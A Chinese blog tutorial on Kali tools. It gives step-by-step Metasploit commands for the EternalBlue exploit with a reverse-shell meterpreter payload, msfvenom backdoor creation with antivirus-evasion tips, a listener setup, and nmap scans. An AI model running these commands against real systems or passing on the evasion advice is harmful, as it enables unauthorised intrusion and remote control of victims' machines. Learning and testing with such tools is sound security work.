【网络安全】-kali基本工具

已于 2024-01-27 23:02:21 修改
阅读量3.2k 收藏 32
点赞数 12
分类专栏: 通信与信息 文章标签: web安全 安全
于 2024-01-20 21:37:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41753052/article/details/135720236
版权

secure

ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。

一、msf渗透

msf(metasploit framework)是一个开源的渗透测试框架,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具漏洞利用模块负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。

msf使用法则:使用模块->配置模块必选项->运行模块

msfconsole		//进入msf控制台,以使用模块(推荐root权限)
>>>进入msf

//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

1、有此漏洞的目标主机

metasploit攻击永恒之蓝(后门)

//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机(常用)

没有漏洞就得拍个间谍过去,把后门打开。

2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线,更容易策反meterpreter,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]
在这里插入图片描述
避开杀毒软件
方法一:和正常软件捆绑
在这里插入图片描述
方法二:给辅助软件加壳
自行寻找

2.2 本地主机的接应程序:

use exploit/multi/handler	//攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run

二、nmap扫描

nmap(Network Mapper)是一个网络扫描工具,用于发现网络中的设备和主机,以及收集有关它们的信息。它可以通过发送各种网络请求和探测包来扫描目标系统,以确定其开放端口、运行的服务、操作系统类型和其他相关信息。

nmap的使用

推荐使用root权限进行nmap扫描。

//扫描整个网段,哪些机器可以ping通
nmap -sP 192.168.x.0/24

//扫描目标主机192.168.x.x开放了哪些TCP端口
nmap -sT 192.168.x.x
//扫描192.168.x.x开放了哪些UDP端口。非常耗时!
nmap -sU 192.168.x.x

# 全面扫描192.168.x.x系统信息
nmap -A 192.168.x.x
桃子酱紫君
关注
专栏目录
penetration-testing-with-kali.pdf
08-10
Kali Linux 提供了多种渗透测试工具,如 Nmap、 Nessus、Metasploit 等,帮助安全专业人员执行渗透测试。 Offensive SecurityPWK(Penetration Testing with Kali Linux)是 Offensive Security 公司提供的一门...
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 4万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
kali工具的使用
TGFXK的博客
02-28 5736
一、netcat简介与使用 nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。NetCat没有图形界面,很粗糙,很原始。Nc主要功能,Nc可以在两台设备上面相互交互,即侦听模式/传 nc工具的下载及安装: 下载:地址The GNU netcat - Browse
全网最全的Kali工具大全
MachineGunJoe666
10-12 9565
对每个工具的具体用途做了大概的描述。利用msf的exp结合xss构造有攻击性的html页面,当浏览器访问即会受到攻击并获取shell。生成包含exp的windows/android等各平台的可执行文件,木马制作利器。修改本机上网时的mac地址,一用作身份隐藏,二可用来绕过wifi mac黑名单。可向AP发送大量连接、断开请求,可向周围设备告知存在根本不存在的大量AP。类似gcc的编译器,更轻量,可编译c、c++、Objective-C。基于已捕获握手包和密码字典的WPA-PSK加密的wifi密码的猜解。
网安入门必备的12个kali Linux工具
小王的储物间
06-08 3327
是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。是一个开源的渗透测试工具,可以用来进行自动化检测,能自动化利用 SQL 注入漏洞的过程,帮助你接管数据库服务器。它可以用于测试应用程序的会话令牌或其他重要的数据项,如反 CSRF。最为知名的子项目是开源的Metasploit框架,一套针对远程主机进行开发和执行“exploit代码”的工具。(扫描器)— 一个 Web 应用程序安全扫描器,用于执行 Web 应用程序的自动漏洞扫描。
用于黑客渗透测试的 21 个最佳 Kali Linux 工具
WANGJUNAIJIAO的博客
06-07 3090
实际上 Kali Linux 捆绑了很多工具。请参考 Kali Linux 的官方工具列表页面来查找所有内容。你会发现其中一些是完全自由开源的,而有些则是专有解决方案(但是免费)。但是,出于商业目的,你应该始终选择高级版本。
网络攻防安全kali Linux漏洞扫描
最新发布
06-18
### 知识点详解 #### 一、网络攻防安全中的Kali Linux漏洞扫描 **Kali Linux**是一款专门设计用于数字取证、...无论是对于希望从事网络安全工作的个人还是需要维护网络安全的企业来说,掌握这些工具都是非常重要的。
lxc-kali:LXC的模板Kali
05-09
2. **Kali Linux**:Kali Linux是一套专门用于网络安全和渗透测试的Linux发行版,内置了大量的安全工具。了解这些工具的用途和使用方法是必要的。 3. **网络配置**:在LXC容器中,需要正确配置网络接口以确保容器能...
30分钟快速安装虚拟机系统 -kali/渗透测试/网络安全/信息安全
06-29
标题中的“30分钟快速安装虚拟机系统 - kali/渗透测试/网络安全/信息安全”表明了这个...教程内容可能包括但不限于虚拟机的设置、Kali Linux的安装流程、基本网络安全概念、以及如何使用内置的渗透测试工具进行测试。
kali入门--fping工具的使用
12-19
网络安全审计、网络故障排查和系统管理中,fping是一个强大的工具。它可以快速识别网络中的活跃设备,找出可能的故障点,或者在渗透测试中定位潜在的目标。通过结合不同的参数,用户可以根据具体需求定制扫描行为...
kali linux入门及常用简单工具介绍
2301_77815877的博客
05-10 1万+
相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍正如刚才所说,kali里集成了大量的黑客工具网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
黑客圈最受欢迎的21个Kali Linux 工具,你用过几个?
m0_71745484的博客
05-27 4483
21款Kali Linux 工具,用过的都爱不释手!
全网最全的Kali工具介绍大全
Python_0011的博客
06-07 747
如果你读过 Kali Linux 点评,你就知道为什么它被认为是最好的黑客渗透测试的 Linux 发行版之一,而且名副其实。它带有许多工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。它是道德黑客ethical hacker最推荐的 Linux 发行版之一。即使你不是黑客而是网站管理员 —— 你仍然可以利用其中某些工具轻松地扫描你的网络服务器或网页。在任何一种情况下,无论你的目的是什么 —— 让我们来看看你应该使用的一些最好的 Kali Linux 工具
如何利用Kali Linux进行网站渗透测试:最常用工具详解
weixin_43263566的博客
05-13 7400
Kali Linux 2022.4虚拟机中常用的渗透测试工具介绍
kali总结——基本工具
haoaaao的博客
04-02 8436
一、netcat 1、 功能: 监听模式/传输模式、telnet/获取banner信息、传输文本信息、传输文件/目录、加密传输文件、传承控制/木马、加密所有流量、流媒体服务器、远程克隆硬盘 2、nc-telnet/banner 可作为客户端使用、也可作为服务器端使用 (1)nc -vn v显示详细连接信息,n后面跟一个ip。由于直接进行域名解析比较慢,所以通常先把域名对应的ip解析出来,然后用nc连ip,就可以查看到服务器的banner信息. ...
Kali Linux神秘工具教程(详细版)
简介
02-03 1万+
Kali Linux是道德黑客最好的开源安全软件包之一,包含一组按类别划分的工具Kali Linux 可以作为操作系统安装在机器中,本教程对此进行了讨论。安装 Kali Linux 是一个实用的选择,因为它提供了更多选项来工作和组合工具。本教程全面了解了 Kali Linux,并解释了如何在实践中使用它。本文讲解了kali神秘工具,下期讲解社会工程和压力工具
kali工具大全使用方法
07-17
Kali Linux 是一种专门用于网络安全渗透测试的操作系统。它包含了大量的安全测试工具,可以帮助渗透测试人员和安全研究人员快速地完成各种安全测试任务。下面是 Kali Linux 中常用的一些工具及其使用方法: 1. Nmap:用于扫描目标主机的开放端口和服务,可以通过以下命令进行使用:nmap -sS [目标主机地址]。 2. Metasploit:用于漏洞扫描和渗透测试,可以通过以下命令进行使用:msfconsole。 3. Wireshark:用于网络流量分析和抓包,可以通过以下命令进行使用:wireshark。 4. Aircrack-ng:用于无线网络渗透测试,可以通过以下命令进行使用:aircrack-ng [抓包文件路径]。 5. Hydra:用于密码爆破,可以通过以下命令进行使用:hydra -l [用户名] -P [密码字典文件路径] [目标主机地址] [协议]。 6. John the Ripper:也是用于密码破解,可以通过以下命令进行使用:john [加密文件路径]。 7. Sqlmap:用于 SQL 注入测试,可以通过以下命令进行使用:sqlmap -u [目标网址]。 8. Burp Suite:用于 Web 应用程序渗透测试,可以通过以下命令进行使用:burpsuite。 以上仅是其中的几个常用工具Kali Linux 还包含了大量的其他安全测试工具,需要根据具体的测试需求选择使用。同时,使用这些工具需要遵守法律法规和道德准则,不得用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值